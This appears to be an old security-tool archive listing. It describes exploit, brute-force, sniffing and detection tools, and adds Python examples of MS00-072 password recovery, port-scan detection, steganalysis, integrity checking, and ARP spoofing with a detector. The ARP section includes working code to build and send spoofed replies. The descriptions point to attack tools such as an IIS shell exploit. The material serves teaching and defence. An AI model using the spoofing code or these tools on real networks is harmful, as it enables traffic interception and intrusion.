Windows 2000 remote IIS .ida exploit - Spawns a shell on port 8008. Tested on Win2k with no service pack and SP2. Includes instructions on finding the offset.
a5c87b494e047e53be40395d92e556f28ceb11a767e48bdc5dfaeb792bf0cbf2
Share Password Checker acquires the list of shared folders of a Windows 95/98/Me machine on the network and shows you those folders' passwords. It also acquires the list of shared folders on Windows NT/2000 machines, but there it can only distinguish folders that have no password. Share Password Checker exploits the "Share Level Password" vulnerability and is intended to check whether the patch for that vulnerability has been applied to the target host. See the topic Reveal Windows9x Share Password for more detail.
68ffcf6b92de4161369856d55490632077c5eedbc5d8e39999e6710a4768f31c
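The flaw the checker relies on is a length-truncating password comparison: the Windows 9x server compared only as many bytes as the client sent, so the share password could be recovered one byte at a time instead of by full brute force (the bug Microsoft patched as MS00-072). The following Python is an added illustration of that mechanism and is not Share Password Checker's own code; the stored password and the check functions are constructed for the demonstration.

```python
import hmac

# Constructed secret for the demonstration; on a real Windows 9x host the
# share password lives in the server, and the checker only talks to it.
SECRET = b"secr3t!"


def vulnerable_check(stored: bytes, sent: bytes) -> bool:
    """Flawed comparison of the kind MS00-072 describes: only as many bytes
    as the client supplied are compared, so a one-byte guess matching the
    first byte of the stored password is accepted."""
    return len(sent) > 0 and stored[:len(sent)] == sent


def fixed_check(stored: bytes, sent: bytes) -> bool:
    """Patched behaviour: the full stored password must match (constant-time)."""
    return len(stored) == len(sent) and hmac.compare_digest(stored, sent)


def recover(check, max_len: int = 14):
    """Recover a password byte by byte against a length-truncating check.
    Returns (recovered_bytes, attempts). Against a correct check the loop
    gives up after one round of 256 guesses with nothing recovered (unless
    the password happens to be a single byte)."""
    known = b""
    attempts = 0
    while len(known) < max_len:
        for candidate in range(256):
            attempts += 1
            if check(known + bytes([candidate])):
                known += bytes([candidate])
                break
        else:
            break  # no single byte extends the prefix: nothing more to learn
    return known, attempts


if __name__ == "__main__":
    pw, n = recover(lambda guess: vulnerable_check(SECRET, guess))
    print(f"vulnerable server: recovered {pw!r} in {n} guesses "
          f"(exhaustive search would need up to 256**{len(SECRET)})")
    pw, n = recover(lambda guess: fixed_check(SECRET, guess))
    print(f"patched server: recovered {pw!r} after {n} guesses")
```

Against the truncating check the cost is at most 256 guesses per byte, which is why a checker can verify the patch quickly: it sends a one-byte password and watches whether the server accepts it.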
GetAcct sidesteps "RestrictAnonymous=1" and acquires account information on Windows NT/2000 machines.
5b6bbd73cb22a89f3ab034094eb23b9a4bd57627c373c87d1de7aa635ae60e38
ScoopLM recovers passwords from captured LM/NTLM authentication exchanges (LanManager and Windows NT challenge/response). Tested on Windows 2000.
383905e6cda11790aee4510ec73ca026bdcf996dccdaac5e51ba8609abc73a42
Promiscan is Windows software that searches for machines in promiscuous mode on the local network. It does this quickly and without generating a high network load. Tested on Windows 2000 Professional. Requires WinPcap.
3a6524a2c100de9ecb3624e7cdb458d2c4772fa6e687cb2353e3824e3e5e5298
This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.
3497cd653b279784cce1aa396afd42714a6d57bcfe180d6ca6198520adde498b
Port Scan Attack Detector (psad) is a perl program that is designed to work with Linux firewalling code (iptables in the 2.4.x kernels, and ipchains in the 2.2.x kernels) to detect port scans. It features a set of highly configurable danger thresholds (with sensible defaults provided), verbose alert messages that include the source, destination, scanned port range, begin and end times, TCP flags and corresponding nmap options (Linux 2.4.x kernels only), email alerting, and automatic blocking of offending IP addresses via dynamic configuration of ipchains/iptables firewall rulesets. In addition, for the 2.4.x kernels psad incorporates many of the TCP signatures included in Snort to detect highly suspect scans for various backdoor programs (e.g. EvilFTP, GirlFriend, SubSeven), DDoS tools (mstream, shaft), and advanced port scans (syn, fin, Xmas) which are easily leveraged against a machine via nmap.
29794f8eeb026de0c58ab24a283076072d77a7f8f61d8675b4f555b89fd68687
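The core of what psad does is read iptables LOG lines from syslog, group them by source address, count the distinct ports each source touched, map that count to a danger level, and classify the TCP flag combinations into the nmap scan types they correspond to. The Python below is an added example of that pipeline written for this page; it is not psad's code. The log lines are constructed, the danger thresholds are chosen for the example (psad's own are configurable), and the auto-block command uses plain iptables syntax.

```python
import re
from collections import defaultdict

# Constructed iptables LOG lines in syslog form: 10.0.0.5 SYN-probes six
# ports, 10.0.0.9 sends one Xmas probe, 10.0.0.7 is a lone ACK that matches
# no scan signature.
SAMPLE_LOG = """\
Jan  5 12:00:01 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.1 LEN=40 TTL=48 ID=1 PROTO=TCP SPT=40001 DPT=21 WINDOW=1024 RES=0x00 SYN URGP=0
Jan  5 12:00:01 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.1 LEN=40 TTL=48 ID=2 PROTO=TCP SPT=40001 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Jan  5 12:00:01 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.1 LEN=40 TTL=48 ID=3 PROTO=TCP SPT=40001 DPT=23 WINDOW=1024 RES=0x00 SYN URGP=0
Jan  5 12:00:02 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.1 LEN=40 TTL=48 ID=4 PROTO=TCP SPT=40001 DPT=25 WINDOW=1024 RES=0x00 SYN URGP=0
Jan  5 12:00:02 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.1 LEN=40 TTL=48 ID=5 PROTO=TCP SPT=40001 DPT=80 WINDOW=1024 RES=0x00 SYN URGP=0
Jan  5 12:00:02 gw kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.1 LEN=40 TTL=48 ID=6 PROTO=TCP SPT=40001 DPT=443 WINDOW=1024 RES=0x00 SYN URGP=0
Jan  5 12:00:03 gw kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.1 LEN=40 TTL=52 ID=7 PROTO=TCP SPT=55555 DPT=22 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
Jan  5 12:00:03 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 LEN=52 TTL=64 ID=8 DF PROTO=TCP SPT=51000 DPT=22 WINDOW=229 RES=0x00 ACK URGP=0
"""

FIELD = re.compile(r"\b(SRC|DST|PROTO|SPT|DPT)=(\S+)")
TCP_FLAG_WORDS = ("SYN", "FIN", "PSH", "URG", "ACK", "RST")

# Flag sets and the nmap option that produces them.
SCAN_SIGNATURES = {
    frozenset({"SYN"}): ("SYN scan", "nmap -sS"),
    frozenset({"FIN"}): ("FIN scan", "nmap -sF"),
    frozenset({"FIN", "PSH", "URG"}): ("Xmas scan", "nmap -sX"),
    frozenset(): ("NULL scan", "nmap -sN"),
}

# (distinct ports hit by one source, danger level): values chosen for this
# example, not psad's shipped defaults.
DANGER_THRESHOLDS = [(5, 1), (15, 2), (150, 3), (1500, 4), (10000, 5)]


def parse_iptables_log(line):
    """Return src/dst/proto/dport/flags for an iptables LOG line, else None."""
    fields = dict(FIELD.findall(line))
    if "SRC" not in fields or fields.get("PROTO") not in ("TCP", "UDP") or "DPT" not in fields:
        return None
    # Only look after PROTO= so the IP-header "DF" word is never mistaken for a flag;
    # \b keeps URGP=0 from matching URG.
    tail = line.split("PROTO=", 1)[1]
    flags = frozenset(w for w in TCP_FLAG_WORDS if re.search(rf"\b{w}\b", tail))
    return {"src": fields["SRC"], "dst": fields["DST"], "proto": fields["PROTO"],
            "dport": int(fields["DPT"]), "flags": flags}


def detect_scans(log_text, thresholds=DANGER_THRESHOLDS):
    """Group packets per source; assign a danger level from the distinct-port
    count and the scan types seen."""
    per_src = defaultdict(lambda: {"ports": set(), "types": set()})
    for line in log_text.splitlines():
        pkt = parse_iptables_log(line)
        if pkt is None:
            continue
        entry = per_src[pkt["src"]]
        entry["ports"].add(pkt["dport"])
        if pkt["proto"] == "TCP":
            sig = SCAN_SIGNATURES.get(pkt["flags"])
            if sig:
                entry["types"].add(sig)
    report = {}
    for src, e in per_src.items():
        level = max((lvl for n, lvl in thresholds if len(e["ports"]) >= n), default=0)
        report[src] = {"level": level, "ports": sorted(e["ports"]), "types": sorted(e["types"])}
    return report


def auto_block_commands(report, min_level=1):
    """iptables rules a psad-style auto-blocker would insert for hot sources."""
    return [f"iptables -I INPUT -s {src} -j DROP"
            for src, e in sorted(report.items()) if e["level"] >= min_level]


if __name__ == "__main__":
    rep = detect_scans(SAMPLE_LOG)
    for src, e in sorted(rep.items()):
        print(src, "level", e["level"], "ports", e["ports"], "types", e["types"])
    print(auto_block_commands(rep))
```

Note that the flag-based signatures only fire on packets the firewall actually logged; a SYN scan of ports that are open and permitted never reaches the LOG target, which is why psad's scan picture is really a picture of what the ruleset rejected.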
Attqt.pl is a tool for sending banned attachments through SMTP gateways by adding an invalid character to the filename. This is known to work against MailMarshal and Trend Micro ScanMail; other gateways are probably vulnerable as well.
1a58cc9c0872e25c6653fb79721d64cc43fbadc32d4cce480e6cf5df091aa5b3
Snmpbrute-fixedup.c is a fixed version of snmpbrute.c, a very fast SNMP brute forcer. Because it does not wait for a response before sending the next guess, it can try community strings very quickly. Tested on Slackware 3.6.
7dbc3fe51c35288a5bc8adfcd06b78f7c7b5f7a51c0d77e67f5bee417dd4f9ed
AE-Gateway is a man-in-the-middle gateway that assists sniffing in switched environments. It forces itself to become an invisible intermediary between the real gateway and the victim host, which works well for sniffing specific machines on switched networks. This is done through ARP reply spoofing; when the application terminates, further ARP replies are sent to put the original MAC addresses back in the ARP tables and minimize traffic interruption.
cb46879f462c268e3ecddd01f3bc39031e1efaa3b08464f9cd0ccee0d3454218
Guidelines for C source code auditing - A basic reference containing some tips, approaches and methods for finding vulnerabilities in C code.
b51ef94c9808338490069713f8eb6404b9f0ffddb2612c40f2369d7c13b0a159
Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL (Secure Sockets Layer) and is available on both Unix and Windows. Stunnel can secure non-SSL-aware daemons and protocols (such as POP, IMAP, NNTP and LDAP) by providing the encryption itself, requiring no changes to the daemon's code.
58dbe96cc345f0da76e6db10ebb3c98646a3db01584b7d4fa8b27ed549838580
SSH (Secure Shell) is a program for logging into another computer over a network, executing commands on a remote machine, and moving files from one machine to another, providing strong authentication and secure communications over insecure channels.
c9d596726f4b8cec7f91f55f8f4a311c0233d4f2a4aa9768daa9fc764b521f0b
The Windows 9x Password List reader is a program that will allow you to see the passwords contained in your Windows pwl database under Unix. You can check the security of these files and try to recover the main password using the bruteforce mode.
cb2d359583804fca1732c431cd82aee6756dbf1f9180a56184ac03cf5fc5facf
Stegdetect is an automated tool for detecting steganographic content in images. It can detect several different methods of embedding hidden information in JPEG images; currently the detectable schemes are jsteg, jphide, and outguess 01.3b.
11e17ea9f4adb250f6a7213d4c0dd3c0e65b2683d506de2af85ea7489f6ed85f
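The jsteg detection in tools of this kind rests on the chi-square test over pairs of values (PoV): LSB embedding in the quantized DCT coefficients pushes the histogram counts of each pair (2k, 2k+1) toward each other, so a histogram whose pairs are suspiciously equal signals embedding. The following Python is an added example of that statistic and is not stegdetect's code: it works on constructed coefficient arrays rather than on a decoded JPEG, uses a Wilson-Hilferty normal approximation for the chi-square tail instead of an exact gamma function, and assumes jsteg's rule of leaving coefficients 0 and 1 untouched.

```python
import math
import random
from collections import Counter


def embedding_probability(chi2, df):
    """Upper-tail probability Q(df, chi2) via the Wilson-Hilferty approximation.
    A value near 1 means the PoV counts are far closer to equal than a
    natural histogram would be, i.e. embedding is likely."""
    if df < 1:
        return 0.0
    z = ((chi2 / df) ** (1.0 / 3.0) - (1.0 - 2.0 / (9.0 * df))) / math.sqrt(2.0 / (9.0 * df))
    return 0.5 * math.erfc(z / math.sqrt(2.0))


def chi_square_pov(coefs):
    """Westfeld/Pfitzmann PoV statistic over DCT coefficient values.
    Returns (chi2, degrees_of_freedom, embedding_probability)."""
    h = Counter(coefs)
    chi2, pairs = 0.0, 0
    for k in range(-32, 32):
        if k == 0:
            continue  # jsteg never touches 0 and 1, so (0, 1) is not a PoV
        even, odd = h[2 * k], h[2 * k + 1]
        expected = (even + odd) / 2.0
        if expected == 0:
            continue
        chi2 += (even - expected) ** 2 / expected
        pairs += 1
    df = pairs - 1
    return chi2, df, embedding_probability(chi2, df)


def synthetic_coefficients(n, rng, decay=0.9):
    """Constructed stand-in for quantized AC coefficients: a symmetric,
    geometrically decaying distribution, so neighbouring histogram bins
    differ by a constant ratio (which is what the test relies on)."""
    values = range(-63, 64)
    weights = [decay ** abs(v) for v in values]
    return rng.choices(values, weights=weights, k=n)


def jsteg_embed(coefs, rng):
    """Replace the LSB of every coefficient other than 0 and 1 with a message
    bit (random here), the way jsteg does for a full-capacity message."""
    return [c if c in (0, 1) else (c & ~1) | rng.getrandbits(1) for c in coefs]


def demo(n=200000, seed=1):
    """Return (p_clean, p_stego) for one constructed cover and its stego version."""
    rng = random.Random(seed)
    clean = synthetic_coefficients(n, rng)
    stego = jsteg_embed(clean, rng)
    return chi_square_pov(clean)[2], chi_square_pov(stego)[2]


if __name__ == "__main__":
    p_clean, p_stego = demo()
    print(f"clean cover: embedding probability {p_clean:.4f}")
    print(f"jsteg cover: embedding probability {p_stego:.4f}")
```

The test is blind to methods that preserve the pair statistics (outguess deliberately corrects the histogram), and partially filled covers only show the effect on the coefficients that were actually used, which is why a real detector runs the statistic over growing prefixes of the coefficient stream rather than once over the whole image.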
snort-rep is a Snort reporting tool that can produce text or HTML output from a syslog snort log file. It is intended to be used for daily e-mail reports to the system administrators. If snort v1.8+ is used, all reports contain priority information, and the HTML output contains direct links to the IDS descriptions at whitehats.com.
b9895bf2d3226917e9a405e816c5229d3384461acf45e0229d7459ba3dc9c223
MIME Defanger is a flexible MIME e-mail scanner designed to protect Windows clients from viruses and other harmful executables. It works with Sendmail 8.10 / 8.11 and will alter or delete various parts of a MIME message according to a flexible configuration file.
b4825360f3b65836d1b64b2aadbc71cbfe615a5a8d9835c3f43ff1674b3d115c
Inflex is an email scanner which encapsulates your existing sendmail server setup. It scans both incoming and outgoing email and it does not alter your current /etc/sendmail.cf file. It can scan for email viruses, unwanted file types (eg. EXE, BMP, MPEG) and file names (eg. prettypark.exe). It can also be used to scan for text snippets within emails.
9c66c26c39cc8c6de30b8e4b31c13ab2ec4b8fc3a1ed4c01fd16df3ac39a4819
Knocker is a simple and easy-to-use TCP security port scanner written in C. It is able to analyze hosts and the network services running on them. Knocker is available for Linux and Unix platforms, in both a console version and a GTK+ version.
b6c8714ba80236c603d417c1c42b30a02c8465c256262a46bab1a03246b5c0a6
Arpwarp is a tool that attempts to detect ARP spoofing attacks before executing a Unix command (such as SSH or Telnet). This is the Solaris version; a Linux version is also available.
13f3623d4cadab729d731d9c920bee3dcc06b5f67697649a85a68142852f9f6e
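The AE-Gateway entry above describes the attack (unsolicited ARP replies that rewrite the gateway's and the victim's ARP tables, then restoring replies at shutdown) and the Arpwarp entry describes the defence (checking the ARP mapping before a sensitive command runs). One added Python example covers both; it is not the code of either tool. It builds the Ethernet/ARP frames with struct, parses them back, and keeps a small IP-to-MAC watch table that raises an alert when a reply changes a known mapping. The addresses are constructed; sending frames needs a Linux AF_PACKET raw socket and root, which only the guarded function at the end touches.

```python
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2
ARP_FMT = "!HHBBH6s4s6s4s"  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa

# Constructed scenario: a gateway, a victim and the attacker's own MAC.
GW_IP, GW_MAC = "192.168.1.1", "00:11:22:33:44:55"
VICTIM_IP, VICTIM_MAC = "192.168.1.10", "66:77:88:99:aa:bb"
ATTACKER_MAC = "de:ad:be:ef:00:01"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an ARP reply 'sender_ip is-at sender_mac',
    delivered unicast to target_mac (42 bytes, no padding)."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, ARP_REPLY,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode an ARP-over-Ethernet frame; None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"op": op, "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def spoof_frames(attacker_mac, gateway_ip, gateway_mac, victim_ip, victim_mac):
    """The two replies a man-in-the-middle gateway sends: the victim learns the
    gateway at the attacker's MAC, the gateway learns the victim there too."""
    return [arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),
            arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)]


def restore_frames(gateway_ip, gateway_mac, victim_ip, victim_mac):
    """Replies sent at shutdown to put the real MACs back in both ARP tables."""
    return [arp_reply(gateway_mac, gateway_ip, victim_mac, victim_ip),
            arp_reply(victim_mac, victim_ip, gateway_mac, gateway_ip)]


class ArpWatch:
    """Arpwarp-style check: remember each IP's MAC and flag any reply that
    changes it. The restoring replies trip it too, which is correct: the
    mapping did change twice."""

    def __init__(self, known=None):
        self.table = {ip: mac.lower() for ip, mac in (known or {}).items()}

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        old = self.table.get(ip)
        self.table[ip] = mac
        if old is not None and old != mac:
            return f"ALERT: {ip} moved from {old} to {mac}"
        return None

    def safe_to_connect(self, ip, expected_mac):
        """Run before ssh/telnet: the cached MAC must still be the trusted one."""
        return self.table.get(ip) == expected_mac.lower()


def send_frames(iface, frames):
    """Linux only, needs CAP_NET_RAW; not exercised offline."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        for f in frames:
            s.send(f)
```

Two things the frames make visible: the poisoning reply is unicast to the host whose table is being rewritten, so a sniffer elsewhere on the switch never sees it, and the restore at shutdown is itself a pair of unsolicited replies, so a watcher that only alerts on the first change misses nothing but should not treat the restore as a second attacker.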
Slides for FX's talk at Defcon 2001 on attacking routing protocols.
68e73b3a5647139ae2a8b7ceb88bc2723866a295c5fdd1b4e948cc7d7e738e78
Snmpbrute.c is a very fast SNMP brute forcer. Because it does not wait for a response before sending the next guess, it can try community strings very quickly. Tested on Slackware 3.6.
ede6eff88c71d88c2794ccb25e697d8172a81ad26b0789a338f10532bf344097
Petrovich is a GPLed filesystem integrity checker similar to Tripwire. It is written in Perl using standard Perl modules available from www.cpan.org. It currently supports Base64 MD2, MD5, and SHA1 hashes. Petrovich has been tested on Windows 2000, OpenBSD 2.6 - 2.8, and RedHat Linux 7.1.
f6d1536844bda3897c7a7ee1beafa6a618fa8544f48798df61fb93e8e5a76663
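An integrity checker of this kind does three things: record a baseline of per-file hashes and metadata, re-scan later, and report what was added, removed or changed. The Python below is an added example of that loop and is not Petrovich's code; it uses SHA-256 rather than the MD2/MD5/SHA1 choices the tool offers, and the file tree it scans is constructed in a temporary directory so the example runs offline.

```python
import hashlib
import json
import os
import stat
import tempfile


def file_record(path):
    """Hash plus the metadata a checker cares about (mode, size, owner)."""
    st = os.lstat(path)
    rec = {"mode": stat.S_IMODE(st.st_mode), "size": st.st_size, "uid": st.st_uid}
    if stat.S_ISREG(st.st_mode):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        rec["sha256"] = h.hexdigest()
    return rec


def snapshot(root):
    """Map of path-relative-to-root -> record for every file under root."""
    db = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            db[os.path.relpath(full, root)] = file_record(full)
    return db


def save_baseline(db, path):
    # The baseline itself must live somewhere the attacker cannot rewrite
    # (read-only media, another host); a baseline on the checked disk is only
    # as trustworthy as the disk.
    with open(path, "w") as f:
        json.dump(db, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Added and removed paths, plus per-field (old, new) diffs for the rest."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for p in set(baseline) & set(current):
        keys = set(baseline[p]) | set(current[p])
        diff = {k: (baseline[p].get(k), current[p].get(k))
                for k in keys if baseline[p].get(k) != current[p].get(k)}
        if diff:
            changed[p] = diff
    return {"added": added, "removed": removed, "changed": changed}


def demo():
    """Constructed tree: a binary is replaced by one of the same size, a file
    is deleted, and a new hidden file appears."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        login = os.path.join(root, "bin", "login")
        passwd = os.path.join(root, "passwd")
        with open(login, "wb") as f:
            f.write(b"original login binary\n")
        with open(passwd, "wb") as f:
            f.write(b"root:x:0:0:root:/root:/bin/sh\n")
        baseline = snapshot(root)
        # same length as the original, so only the hash and mode give it away
        with open(login, "wb") as f:
            f.write(b"trojaned login binary\n")
        os.chmod(login, 0o4755)
        os.remove(passwd)
        with open(os.path.join(root, "bin", ".rootkit"), "wb") as f:
            f.write(b"x")
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```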
Winfingerprint v0.2.0 - Advanced remote Windows OS detection. Current features: determines the OS type via SMB queries (PDC (Primary Domain Controller), BDC (Backup Domain Controller), NT member server, NT Workstation, SQL Server, Novell NetWare server, Windows for Workgroups, Windows 9x); enumerates servers, shares (including administrative $ shares), global groups, users and active services; can scan the Network Neighborhood; can establish a NULL IPC$ session with the host; and can query the registry (currently to determine the service pack level and applied hotfixes).
4b22124cb653fd0d9ff945fcd920fd12590a43cc0067a120be6546c68cc4661b
Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP FTP proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping sweep), TCP ping scanning, direct (non-portmapper) RPC scanning, remote OS identification by TCP/IP fingerprinting, and reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, and detection of down hosts via parallel pings.
b66d46f2fbd8e97a4a750e35af1a751650f38394d9bbf8fe0c184c027ba76590